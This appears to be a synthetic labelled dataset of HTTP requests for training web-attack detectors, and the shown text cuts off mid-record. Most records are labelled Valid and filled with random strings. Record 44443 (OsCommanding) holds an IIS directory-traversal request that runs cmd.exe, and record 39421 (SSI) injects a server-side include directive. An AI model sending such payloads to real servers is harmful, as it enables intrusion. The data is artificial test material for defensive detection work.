ETag: W/"IcfyD2NOXsM1dVnare"
Expect: 100-continue
From: ab7O@nnwAe.gov
If-Modified-Since: Sat, 01 Apr 06 18:38:29 UTC
If-Unmodified-Since: Tue, 07 Jun 05 01:32:46 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7702
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: NTLM b25pYXJlaXRpbGMwbmNkdnRzb2Fjc2RvNml0bWlSZXNobGxsaWVkSHBuaQ==
Authorization: Basic YmFPRXBpZTplamkzRA==
Range: 32-,34539-5523,215-7
Referer: /lfhtm/ebtr/0aIaas/oane3/res4gr.pl
TE: gzip;q=0.2,trailers,trailers
Trailer: Accept
User-Agent: lnvas8eoe (oNurSniO2.)
UA-CPU: StrongARM
UA-Disp: 589,2791,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5443x8172
Via: 6.7 228.133.224.149:0, HTTP/4.0 www.etaxayud.jpg
Transfer-Encoding: compress
Upgrade: sahcq/0.1
Warning: 003 128.98.138.220 "3eksueehheofe0cf" 
X-Forwarded-For: 83.53.98.240
X-Serial-Number: 0947873125180577061
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 19319
Start - Id: 2553
class: Valid
GET /tsT6eb/edn6n4bnatooi/Syaeorerniti/ZlsAi8V/jSe58BA4php/ter/6rhsireit7aele/tgks2TZKc/zs.php?IjsQm8Mobject=div%2F%3DLlda%5B&ONjhttpA48=663&g3dimmeiinoren=2&nnt=trmt&@psJwuAQ63nP=8e6d&nfocssnid=2dea+srs&te2s9mm=h+elnio%5B7+9noi474&hAmeFm6t=ynbin&tyse=yle&kame2irlo2oaco=5&e0r=nsomf HTTP/1.0
Host: www.diubwovntF.be
Connection: keep-alive
Accept: video/*, text/*, application/*
Accept-Charset: isiri-3342
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-age=40
Client-ip: 180.165.26.102
Cookie: hsstaHi4=6206;cusicHureo5zat=vjMFafN;KXG6iwadropqm20=childid;5aRcWa=d)selpy7;vmKyetauM=f74adnsi4slgttd
Cookie2: $Version="37"
Date: Mon, 28 Nov 05 22:34:19 GMT
ETag: W/"SDugzyeX7I4AF8uK0Qm"
Expect: 100-continue
From: ofHrc@8cET.be
If-Modified-Since: Sat, 06 Jun 09 11:00:39 CET
If-Unmodified-Since: Wed, 06 Oct 04 16:44:56 UTC
If-Match: *
If-None-Match: "3xtk.GjehfSDJ.6"
If-Range: "2URm52PL20q.K-ht"
Max-Forwards: 4141
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest username="snnogtsd"
Authorization: Basic eWdpdHQ4YW06d2FxZQ==
Range: -836,37315-,23-
Referer: /emrkr4/edEebEsd/dToaylsh.css
TE: chunked,deflate
Trailer: If-Range
User-Agent: Mozilla/6.9 (compatible; MSIE 0.1; Open BSD i586; eqneSf)
UA-CPU: x86
UA-Disp: 7814,3567,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 266x8527
Via: 1.2 www.aeeeLt.jpeg:37595, FTP/7.0 13.51.174.120:18087, 6.3 www.Htruh.htm
Transfer-Encoding: gzip
Upgrade: ms8e/5.5, bc0udr/8.6
Warning: 953 www.h8zy.png "teAfk" "Tue, 09 May 06 12:50:35 CET"
X-Forwarded-For: 237.59.187.114
X-Serial-Number: 8053339262095703049
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2553
Start - Id: 27518
class: Valid
GET /telnetXe/ictsye8ion/xLKY1_lK1/Taxafe8ts5tdarad0/cDT./iX/lMT6/ato/unhl8a/7oisWoe3e5eqee2cvio/alieshcE.jpg?ahlzdjeeieh=nIP.C3dDl1N&CInsy=jy9sZ3GH&hsdstr3fQHabad=%3Aaccess_loga+pDr HTTP/1.1
Host: 57.93.24.106
Connection: od7c5
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=8
Client-ip: 240.72.18.67
Cookie: edbRagtbfteSiu=56715;ea2tzon3u=6n;gc7zSuBvbscriptU=$O5Ac;u5j=4226723;ieuehpsqit=tm ap D\'acce's;oj=ercv
Cookie2: $Version="1"
Date: Sun, 23 Nov 08 05:14:22 GMT
ETag: "p7VzHMhO8c9vL12v9qK"
Expect: me45h5b
From: Ifxyn@cystcefu.uk
If-Modified-Since: Sun, 07 Dec 08 18:52:54 GMT
If-Unmodified-Since: Fri, 25 Dec 09 23:36:25 GMT
If-Match: "Xid2zeqVhT8xnbo7"
If-None-Match: *
If-Range: Wed, 15 Jul 09 16:55:48 UTC
Max-Forwards: 701
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest qop=CeGosd
Authorization: Gg3aT8 Aloe=hoiva
Range: 895579-,54531-,8-
Referer: /slmo8u/nse0t.conf
TE: chunked;q=0.0,gzip,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/5.2 (X11; U; Solaris 8.5; pe-ld; rv:2.1.7) Gecko/20925822
UA-CPU: PowerPC
UA-Disp: 883,733,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5041x3321
Via: HTTP/1.9 www.ebfi.gif, 4.1 173.60.9.56
Transfer-Encoding: deflate
Upgrade: ieiie/4.6, kord/5.1, Nat/2.2
Warning: 561 www.Nlensr.png "s0qusp6lni" 
X-Forwarded-For: 102.128.80.116
X-Serial-Number: 713179267523
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27518
Start - Id: 44443
class: OsCommanding
GET /IISADMPWD/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 196.24.91.243
Connection: keep-alive
Accept: application/*, application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 173.115.52.160
Cookie: s7Eehtacces=qnoe0dIEgro/\U;v78qeOG=0it;hcavT8pilWaqT=u$l$hotmailseusrhks;rltnrs99sloatea=xsEniw6L
Cookie2: $Version="65"
Date: Fri, 22 Jan 10 10:43:48 GMT
ETag: W/"FP76Uf4Vrb4BtBS"
Expect: 100-continue
From: unh1Ohh@nhsboy.biz
If-Modified-Since: Mon, 22 Mar 04 16:14:03 UTC
If-Unmodified-Since: Tue, 05 Jan 10 11:15:32 UTC
If-Match: *
If-None-Match: "@p.dZyTKrVRi7HBOlW3"
If-Range: Mon, 08 Nov 04 08:50:39 UTC
Max-Forwards: 682
MIME-Version: 6.3
Pragma: eld='ro'
Proxy-Authorization: Basic aWVzODp5ZWh5aQ==
Authorization: NTLM dGRhZWZUaWhoaWFodGFhdGVvZ3JvZTV0ZXNobTFodHROOW9vN3Q=
Range: 6-02287,72753-
Referer: http://www.hyedvmEr.it/lirahl.sh
TE: trailers,trailers
Trailer: From
User-Agent: iWPeeutatteheiutp
UA-CPU: Sparc
UA-Disp: 267,4051,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 053x237
Via: FTP/0.0 183.56.230.149
Transfer-Encoding: deflate
Upgrade: Sarc/2.6, 8ei9c/3.9, zhD/9.6
Warning: 817 97.27.246.180:97 "fri3lee1seear1g" "Thu, 29 May 08 16:18:48 GMT"
X-Forwarded-For: 167.120.10.31
X-Serial-Number: 45781122630812126119
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44443
Start - Id: 20202
class: Valid
GET /hru/zeedmo/edvmraezwuobeYsn/2gET2rhLm1ZV8/rd/teO6YzxK5n.pbh/nndene/aCvfSzNNo8SvWq58/sg4B6Ljwbpiq/ayzCd/eW8tK6y/ie39Lt8t.gif? HTTP/1.0
Host: www.he3iC.it:80
Connection: close
Accept: text/xml;q=0.3
Accept-Charset: x-mac-arabic;q=0.2
Accept-Encoding: compress, identity, compress, identity
Accept-Language: epEezyt-Ds7, 8-zjltth;q=0.9, cwi-Auaa;q=0.1, ovmbe-lCceOlqr
Cache-Control: max-stale
Client-ip: 232.72.29.153
Cookie: yjaj2itw=5;Aexec91-dwhere=hylandeel$ftiframean5Ascriptam;ycc=n;tiEreoQ=57242;obhr=u;vrw81dtr5eL=Kew8
Cookie2: $Version="390"
Date: Mon, 18 Jul 05 04:53:47 CET
ETag: "M8E9jA9nfA7H4st9Hp"
Expect: reju
From: bSdc@weygI.it
If-Modified-Since: Mon, 23 Jul 07 09:09:22 GMT
If-Unmodified-Since: Sat, 23 Feb 08 09:54:30 CET
If-Match: "9jp9PXg7g0uUXYE"
If-None-Match: *
If-Range: Sat, 04 Oct 08 23:59:54 UTC
Max-Forwards: 452
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Digest username="lseoiae3"
Authorization: Digest qop=auth-int
Range: 365749-,607-065
Referer: /wiTiwje/tsSrstP/rPga.php4
TE: gzip;q=0.5,gzip
Trailer: Trailer
User-Agent: Slaahe/0.2.2
UA-CPU: x86
UA-Disp: 7522,1953,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 4940x047
Via: 4.6 243.64.7.193
Transfer-Encoding: identity
Upgrade: lsath/8.3
Warning: 233 60.38.176.3 "MeOt13ias" "Mon, 16 Jan 06 05:38:03 UTC"
X-Forwarded-For: 215.190.87.154
X-Serial-Number: 331968303499551
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20202
Start - Id: 19224
class: Valid
GET /na-F-21YwHr/p-N%uVautoexeclhPi/bdA0/aiqiieoenT.js? HTTP/1.0
Host: www.s1ucDe2a.gov
Connection: keep-alive
Accept: */*
Accept-Charset: koi8, euc-jp;q=0.7, x-mac-turkish;q=0.4
Accept-Encoding: identity
Accept-Language: nl8nwafn-t;q=0.9
Cache-Control: no-cache
Client-ip: 198.40.127.2
Cookie: 9nsdx=dnIerdashc
Cookie2: $Version="324"
Date: Wed, 24 Mar 10 12:28:44 GMT
ETag: W/"mW@gXcO0qwbn-4Ba"
Expect: 100-continue
From: siiaioee@bal3q.biz
If-Modified-Since: Thu, 01 Jul 04 07:56:42 GMT
If-Unmodified-Since: Wed, 18 May 05 20:08:02 GMT
If-Match: *
If-None-Match: "u1KhbBCF31h6MVD1tkA"
If-Range: *
Max-Forwards: 84
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Digest uri=/8tsi1ee/nreUitch/ynlernls/rylqcbHp/vyr6.shtml
Authorization: NTLM bGlhb28wUWl0Y3hvc2VzY3R3dHloemF0dmVlaXhycmFyZGZhdHVvcDUwc3p0OWg=
Range: 0946-,0874-,3-657
Referer: /lnHftcth/ebLbn/aimb/7enh2as.rar
TE: trailers
Trailer: User-Agent
User-Agent: dpecioei (i7T.7TWc; iBCw27cyh; i-vY1pl; nxP2HlhMam)
UA-CPU: 68000
UA-Disp: 399,520,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 484x481
Via: 4.8 142.41.120.141, 6.8 102.165.54.186, 2ots/9.7 82.111.40.92:3
Transfer-Encoding: deflate
Upgrade: deldgt/6.6
Warning: 167 www.rrjgz.png "ktmzrhNp" 
X-Forwarded-For: 122.211.194.113
X-Serial-Number: 7708847
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19224
Start - Id: 39421
class: SSI
GET /gNas/eQbh/b7cuhh5rjte7i/wXUMtWrXS6uPl/VuN0ID6.cfm?eydnrefnlp4Urli=mnRDypLS&enxamhett=ho7shutdown&LFeUD=%3C%21--%23email+fromhost%3D%22www.uofasNrb.com%22+tohost%3D%22mailbox.eNxe.com%22+message%3D%22erOy+x0giyat+honlEi+hIiye%22+fromaddress%3D%225rap7s.com%22+toaddress%3D%22ahon3.laer.com%22+subject%3D%22ot%22+sender%3D%22eaar.com%22+replyto%3D%22cm98s.com%22+cc%3D%22onfy%22+inreplyto%3D%222n+hitu+h8end%22+id%3D%22tn1idmail%22+--%3E HTTP/1.1
Host: www.nsanG.it
Connection: imod9ev
Accept: video/*, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 93.53.204.166
Cookie: aornaogf9Azh=icieTlnlibm8Lfarpopenel;xDi=s<NtnowgetEhwp->cmddropprocessing-instruction1gunionieval;lmhefeisrAith=selectsergnaymqa 
Cookie2: $Version="65"
Date: Thu, 09 Apr 09 10:43:02 GMT
ETag: W/"EqD@suDSZ-6kzkU3OMMy"
Expect: 100-continue
From: apYenet@6eifconf.ch
If-Modified-Since: Mon, 22 Oct 07 01:31:11 UTC
If-Unmodified-Since: Wed, 02 Apr 08 16:11:58 CET
If-Match: "CyQfY5W.72ojlaLb8n"
If-None-Match: *
If-Range: *
Max-Forwards: 4140
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Basic M3dvaWU6MHk0Mms=
Authorization: Basic ZXk5ZW86b3lhb3J1
Range: 02-,96-
Referer: http://www.shHna.org/photadze/e7uIy.gif
TE: trailers,trailers
Trailer: Upgrade
User-Agent: nEtcsbwso (rwHijyG; ab1gZBw; ns8o-DDTEY)
UA-CPU: StrongARM
UA-Disp: 9324,2062,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3896x417
Via: HTTP/8.4 46.39.162.161:50
Transfer-Encoding: gzip
Upgrade: oonp/1.0
Warning: 911 148.86.166.125:8448 "aOi1" 
X-Serial-Number: 599135486061
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39421
Start - Id: 24374
class: Valid
GET /pSldtq3/eQ9mpO9dIlbY/oVi@IrCcQYSizT/ekVzQTWa.dll?oifirG=srensa0fausn&dogueoeu=ptenf&nekaYaomeetd=+f9y%2Feeqms%7Eu%5Begi&jwdiv.=St&ugeFdnnTlrpwh=olozaH%25oeBy&xvfitpo=ueih2roinewsco&Sss=n1oT4g&winntposition1a3PhrIJRJ=4Ba5&e6=158 HTTP/1.0
Host: 100.252.57.103
Connection: keep-alive
Accept: text/*;q=0.6
Accept-Charset: cp-936;q=0.9, x-mac-korean, koi8-r, euc-cn;q=0.6
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 27.107.78.108
Cookie: rameetebdoh=nX5;retMunsnted6m=r;smnerNarhds=nnhaetrrs1
Cookie2: $Version="3"
Date: Thu, 01 Mar 07 09:04:55 GMT
ETag: W/"iGg4GyFoonVM8sn"
Expect: aedo=aeestted
From: 1egsitm@nl59d.com
If-Modified-Since: Thu, 12 Jun 08 18:01:17 CET
If-Unmodified-Since: Tue, 05 Sep 06 11:00:03 UTC
If-Match: *
If-None-Match: ".zQxvi9tOrTu3W_nEJ"
If-Range: Mon, 21 Feb 05 13:21:23 CET
Max-Forwards: 87
MIME-Version: 0.8
Pragma: hun=St0ipnes
Proxy-Authorization: NTLM c29ib2V0ZXB6dGpzc2k2bm1vcnJoYWV0SXQwZ3RvczZ0bg==
Authorization: Digest uri=http://www.Am01mrw.st/ftO4b/6cCspk66.jpeg
Range: 18-
Referer: http://www.ozhoi.uk/e2crcaM.nsf
TE: gzip
Trailer: Accept-Charset
User-Agent: Mozilla/8.7 (Windows; U; WinNT 3.4; bd-it; rv:0.1.7) Gecko/45064922
UA-CPU: MIPS
UA-Disp: 801,8735,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 2262x1293
Via: FTP/4.5 249.160.246.159, 6.1 251.59.193.248
Transfer-Encoding: deflate
Upgrade: dl2nol/1.8, hopeH/5.6, tvmd/4.2
Warning: 317 www.kcoono.tiff "csd2erdpoarTetors" 
X-Forwarded-For: 231.128.57.40
X-Serial-Number: 6737813475044771
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 24374
Start - Id: 7161
class: Valid
POST /u-GsAKDCwswB/4AGxj17EN/hcU..OI5U93Hw4/ardoe0/zm2SO5/tOp9sssoJkoElec/gy/acviceknus.html? HTTP/1.0
Content-Length: 212
Content-Language: beqAeh
Content-Encoding: deflate
Content-Location: /boeah.tar
Content-MD5: UkpmcHRlQXJzMW1uTHBiYg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 15 Jul 09 15:44:24 CET
Last-Modified: Wed, 06 Aug 08 03:43:23 CET
Host: www.iqee6pte1.it:2418
Connection: s6eino
Accept: */*;q=0.4
Accept-Charset: cp-936, windows-1251, iso-8859-4;q=0.8, koi8, x-mac-chinesetrad;q=0.0
Accept-Encoding: gzip;q=0.4, deflate, gzip
Accept-Language: *;q=0.5
Cache-Control: max-age=632
Client-ip: 173.225.60.58
Cookie: cmco=t7e;Hsvtamspta=nqNu6-h.gA5x;eeRcn6on=sIgm4
Cookie2: $Version="09"
Date: Tue, 07 Sep 04 08:20:03 UTC
ETag: W/"RivLDL4hE_xM22g38l"
Expect: 100-continue
From: nnieoiP@edatAyr.uk
If-Modified-Since: Wed, 19 Mar 08 05:33:14 CET
If-Unmodified-Since: Tue, 03 May 05 01:33:19 UTC
If-Match: "ZFapby6I98Zh5cv7"
If-None-Match: "GI3K420UBoMsSAnZ"
If-Range: Thu, 29 Oct 09 06:12:43 CET
Max-Forwards: 88
MIME-Version: 2.9
Pragma: iC='ef'
Proxy-Authorization: NTLM ZUloaHNPaXI3dGw3dGVsTmloM1VUeWFkcnRyVHRobDdkaEh0aG14ZDhlcw==
Authorization: NTLM ZnNyYWFXcGVzaERCVG10YnRlYmVlb2FlYWllZ2V0aWVpZWVsY2l0eg==
Range: 21-
Referer: /qaoytY/aooaaE.asmx
TE: trailers,trailers
Trailer: Pragma
User-Agent: iqVXIjw5O http://www.enuxhs.ch
UA-CPU: MIPS
UA-Disp: 1964,0580,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 976x2484
Via: HTTP/1.0 52.145.213.154, 4.6 158.236.198.133, rqt/2.7 www.te0iM.gif
Transfer-Encoding: identity
Upgrade: ecs3ms/8.7, i206fu/9.3, stsan/9.3
Warning: 533 208.227.184.176 "cD07lo" "Wed, 21 Jul 04 12:51:23 CET"
X-Forwarded-For: 14.39.4.242
X-Serial-Number: 73109423646427331
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

st1cizLaeasinu=458011690&liGhfNuTns4==roo=s@&fo2asioshumoni=BHpltM9tDDo4r&jpassthruns6un0qp=6183665451&zdemoela=1mir&DOt4OlvK=c&baned33Oays=snullrall 3ouls2&hutw=756&bsI=oatA&shLcMisrrecner=%NLeeriuS0KWld

End - Id: 7161
Start - Id: 3550
class: Valid
GET /ecaakLej8/vuRicsur2oemmse/rx3-./nja4h6aIOfonwandooN/37mcRHyftCxJf3Y/2257uOOdz/j0OUPPG96a/c-3YV4sHqFZ_amAuZa2./seh0tsGksNuefit/ls/TL4mErgmerroI/ba1txuE.jpeg?i5gEBzYWAARimg=apxVqBp&Wf5ZexecpassthrughhBIW=se+%3BoNsZd%3Ei%2BnsuHbpositiona HTTP/1.0
Host: 195.245.58.133
Connection: Simh
Accept: */*
Accept-Charset: utf-7;q=0.0, x-mac-icelandic, iso-8859-6
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-transform
Client-ip: 158.1.19.6
Cookie: nisupacdgdav=0liz;deE1sap=eoe;M4GNb3s=dN.pc9R0PQs;nTblgo=60911;5passthruandCiW3W=424
Cookie2: $Version="4"
Date: Thu, 25 Sep 08 16:49:29 GMT
ETag: "SB9beLAXh_TSR9h5-qU"
Expect: 100-continue
From: en6o@GjeessSofa.org
If-Modified-Since: Mon, 01 Mar 10 07:43:45 GMT
If-Unmodified-Since: Sat, 04 Mar 06 13:00:29 GMT
If-Match: "susZ2zhROpLUXoA@yWrA"
If-None-Match: "UM8qsMjbz4MIgeoYrHiG"
If-Range: "YwNw2UgGP2343tHTJ6A"
Max-Forwards: 328
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: gu9n tahhnbsr=mhYueol
Authorization: NTLM eWhlRWdpMzZ5VE50MWFyaWNsbGlkZTZob2tobmljb3llcm9kQjM=
Range: -6441,532139-93,33703-4
Referer: /j0lf9.jsp
TE: trailers
Trailer: Date
User-Agent: 1nd9ta9h5lenhpRhls4
UA-CPU: MIPS
UA-Disp: 0012,4574,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 162x0756
Via: 0.8 www.jilm.jpg, 3.8 255.150.248.146:682, Tnege/0.2 19.99.92.189:60
Transfer-Encoding: compress
Upgrade: ayed/3.7
Warning: 342 233.167.105.67 "eneoshetbsundot" 
X-Forwarded-For: 63.217.151.16
X-Serial-Number: 0103984813938980
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3550
Start - Id: 1705
class: Valid
GET /nGayFphou88e-89fyS.php?xXehjeea=%7Es%3A&a2YNXl8qz=xi+6zeu+&n1=iOCMeAfmEjxI&pt5t2=y.-%404x%40ay&o2pmBi7kzarrgw=%5C3&atw68sLas9sme=Ew%2F&55rsgiAaue=snaF7v&yysock_streamD30aifkH=51739&ien4fnsNua=Ewu4Umrhxast7&yr=0438&l4kdtinge=eleo0ota&sconnectXYGv=4lrtwt&euoueetsiI=aXzVKamyJ&ay=82 HTTP/1.1
Host: www.dsbeti.gov:29013
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1253;q=0.1, euc-cn
Accept-Encoding: 
Accept-Language: ear49i-eseSe;q=0.5, E68-buM3othe, tr-ermymcun;q=0.3, tXnhu-s3lhbjo, 6io-odt;q=0.0
Cache-Control: min-fresh=226
Client-ip: 125.202.6.4
Cookie: divmeta1VWRD7=ie ne;clLI-q4-hl=328015;rwlcmsLdrwz=14;E5TphMxautoexecO=window.openc;rOmedyc9y8pn0=winnthHtm6group bymmt|;7
Cookie2: $Version="8"
Date: Sat, 28 May 05 18:36:37 UTC
ETag: "Fdw5KeeYNqeUops-CWNn"
Expect: rcieAm5l
From: pa7hs@flEnsebniq.be
If-Modified-Since: Tue, 23 Sep 08 13:24:33 UTC
If-Unmodified-Since: Mon, 08 Jan 07 10:23:50 GMT
If-Match: "D0shhJB@JgVFYqMPoN39"
If-None-Match: *
If-Range: "JCofTTam8effiFmWjbR"
Max-Forwards: 40
MIME-Version: 0.3
Pragma: nsp='oem5e'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest username="ieEpriee"
Range: 73-
Referer: /io7inAor/sectO/rnaeum.mdb
TE: trailers,trailers,gzip
Trailer: Accept
User-Agent: Mozilla/8.8 (X11; U; Unix 9.0; tU-si; rv:3.2.1) Gecko/70764375
UA-CPU: StrongARM
UA-Disp: 6638,4343,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3865x207
Via: 5.8 14.168.250.252:8606, tco/1.7 www.hluuh.htm
Transfer-Encoding: identity
Upgrade: eba/9.5, rtti/0.6, Saos/3.8
Warning: 172 www.poy0Rt8.tiff "fikd" "Wed, 05 Aug 09 17:49:17 UTC"
X-Forwarded-For: 53.157.224.180
X-Serial-Number: 3355979393710804862
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1705
Start - Id: 4451
class: Valid
PUT /etzsr5ofilgstdbLnx/eJV549eLQbVRR8tKwK/UVnxGKdropNM/rF/ncY4Ifr/7l/nmfsWgh/cs.Rjn9QZE/3Pb.sh? HTTP/1.0
Content-Length: 256
Content-Language: omah3nns,o0orE
Content-Encoding: identity
Content-Location: /mbn4/tm5oA3ht.js
Content-MD5: ZGJ6Umw5Y2FzYXo1YXNpZg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 09 Apr 06 22:47:24 UTC
Last-Modified: Fri, 08 Feb 08 11:16:53 CET
Host: www.Kueen.uk
Connection: unelR
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.8, gzip;q=0.1, deflate;q=0.9
Accept-Language: vOws-ewstbte, yn-e, tneaehas-tnci3woi, Vcue-nsdfis, eh-n;q=0.6
Cache-Control: max-age=46
Client-ip: 158.211.9.8
Cookie: ioiosm=nWx;vaf=heuree;Hnbn=275966523
Cookie2: $Version="774"
Date: Tue, 22 Mar 05 01:08:06 UTC
ETag: W/"GJZ0QwxfnKVrWTPAX_Q"
Expect: 100-continue
From: onresk@onoddtq.be
If-Modified-Since: Mon, 10 Apr 06 15:46:04 GMT
If-Unmodified-Since: Fri, 29 Dec 06 17:52:36 UTC
If-Match: *
If-None-Match: "bZXiegKygRmJgdQy"
If-Range: Sun, 28 Sep 08 24:03:28 UTC
Max-Forwards: 894
MIME-Version: 8.6
Pragma: c1tYsWy='lx'
Proxy-Authorization: NTLM c2F0ZWVoOGRQckVvdWVvNWxlb2hvczY2amdlcm9uczI=
Authorization: Basic ZWllRUpoOmlyTm5jcHE=
Range: 64421-813,254899-
Referer: http://www.thcs.uk/S2einl/eermnes.rar
TE: trailers,trailers
Trailer: Connection
User-Agent: arHyboSi
UA-CPU: StrongARM
UA-Disp: 5974,926,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 604x596
Via: 3.0 www.sqnys.tiff:40
Transfer-Encoding: y8ot
Upgrade: caueo/3.4, rif/5.0
Warning: 774 98.7.54.149 "snI8ejlpssn" "Tue, 19 Apr 05 06:05:00 CET"
X-Forwarded-For: 11.144.91.166
X-Serial-Number: 053208446
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

7Etn=fb&FarnUb6fgo=c0wOneYn6Mt&q4fn=rL19&Ebdeal= eotcopya(36s&msawtei=qlxeoelef&wdAppne=4(xNloas&tihne=0eaarE4&Eiyroh73hd5=16t$&te7pp59keeos5=yygtR&tDstTZe8ewp=t:d+&batd32sUrweag=733&eienaajtlr=+u0angdnOMe&en9tlfoe=oaotmpye$g&4scriptjx_HV=ivn

End - Id: 4451
Start - Id: 24797
class: Valid
GET /dahthNe7Ohpoatotsht/umn/taN/lhLv/2EnYidGzH/nu/m3c2mrne3ntvoues/jaRxmPcTQeI/e9rsewhdmsj/twLFFB/poa2aNtspqs.png?pXIks=ogb&fadi=342&rekhiIaltpjfl=abcv&no8n=oEw2Z&mAejaW3EhACn=%29tmSE&5dnrNbaSy7oit=toe%28&LoahIw0nlht=alea90h&9ii0k=106031&aVeG=9396507646&iyetEi=wX%40A&090zRBIrbin=55263&ftpNNN1=Nucopsca7Nn0dor%3D%7C+e HTTP/1.0
Host: www.hsfbdor5.gov
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: min-fresh=331
Client-ip: 36.103.223.151
Cookie: YJSx2TY9v=78959;pbirtkebd0rt=ER;sta=sR4t;rHqPSlsN1nr=bini3zscriptssXs;VQdGXrJqz=irl;rfethl96xkoea=snjs8vba
Cookie2: $Version="585"
Date: Sun, 20 May 07 20:35:21 UTC
ETag: W/"3M.kholm9_fIPRMrv"
Expect: ahge=NataOsrt;Rmena=swoi
From: iesi0goR@Pnih.ch
If-Modified-Since: Wed, 25 Jun 08 17:05:13 CET
If-Unmodified-Since: Thu, 15 Jan 09 13:38:08 GMT
If-Match: "ABkYj1CMJ5kXF29-Ax4"
If-None-Match: "-jaU2UPRvuAmWNs"
If-Range: *
Max-Forwards: 19
MIME-Version: 8.0
Pragma: rpeholN='oeymi9'
Proxy-Authorization: Nixaoe ihecer=0gNx
Authorization: NTLM c3RvM2RjZHp5dXROZWh5Y1NvTWxzZWRhYmFlbnBvb2xoSWR5MG9nZXNleG5PYw==
Range: -5,-50,2-85387
Referer: /6edoe/nfeeah/gtoefe.swf
TE: trailers,trailers,deflate;q=0.0
Trailer: Via
User-Agent: fTkiySiuve (2EZQ.c; eRFFqLl.I; 9iymAwL; nbz_NDZa; aHuvZxip.F)
UA-CPU: x86
UA-Disp: 1309,0345,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 3792x2228
Via: HTTP/0.4 www.odthn.jpg, FTP/0.0 www.qterr.htm
Transfer-Encoding: deflate
Upgrade: hth/9.0, mu3eiy/7.6, tfet8s/2.8, lWeo9d/7.8, oud/9.2
Warning: 449 www.ietcs.gif "QrTsopa" "Sat, 26 Sep 09 14:09:23 UTC"
X-Forwarded-For: 21.89.90.200
X-Serial-Number: 56718
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24797
Start - Id: 1317
class: Valid
GET /aff3uLgM-6P/nAz33ocbTbamrog/tmpOupdateZEAdocument/eeNSEqleozgtsaAltt/mxs@4c/eyb-1Ah.ZqL-doDLReX/ttrpfG0T0t2vejh/ltVmKJXZf3kjs/H0n-/e8IegTXg5_oojn91S.asp?disitsbnpI=734780&esquh5d=37575283&ui=2&lsheuct1en=orh5nizciinrdii&uisxssucsae6t=n86&sthruucuiTwr=tA72KG6v&rnuAedjrr6e4o=orY&pn=7&OvOw=onvar&e6p=30258573&sd1scp8adsl=615886 HTTP/1.0
Host: www.rsrmhae.ch
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: iso-8859-8-i;q=0.7
Accept-Encoding: deflate, identity;q=0.2, gzip
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 58.67.184.51
Cookie: 1ajSl4l=34oattE4bml;re=23;teeas3egstH=alN4H5zc
Cookie2: $Version="16"
Date: Sun, 23 Jul 06 01:06:33 GMT
ETag: "HQ8uSCW@L4-@PRWl"
Expect: 2arTnecm
From: strldbE@9qmhittm.gov
If-Modified-Since: Wed, 26 May 04 22:23:11 CET
If-Unmodified-Since: Fri, 06 Feb 09 23:10:09 CET
If-Match: *
If-None-Match: "SaphDDFJ8xqbGrf2nGjz"
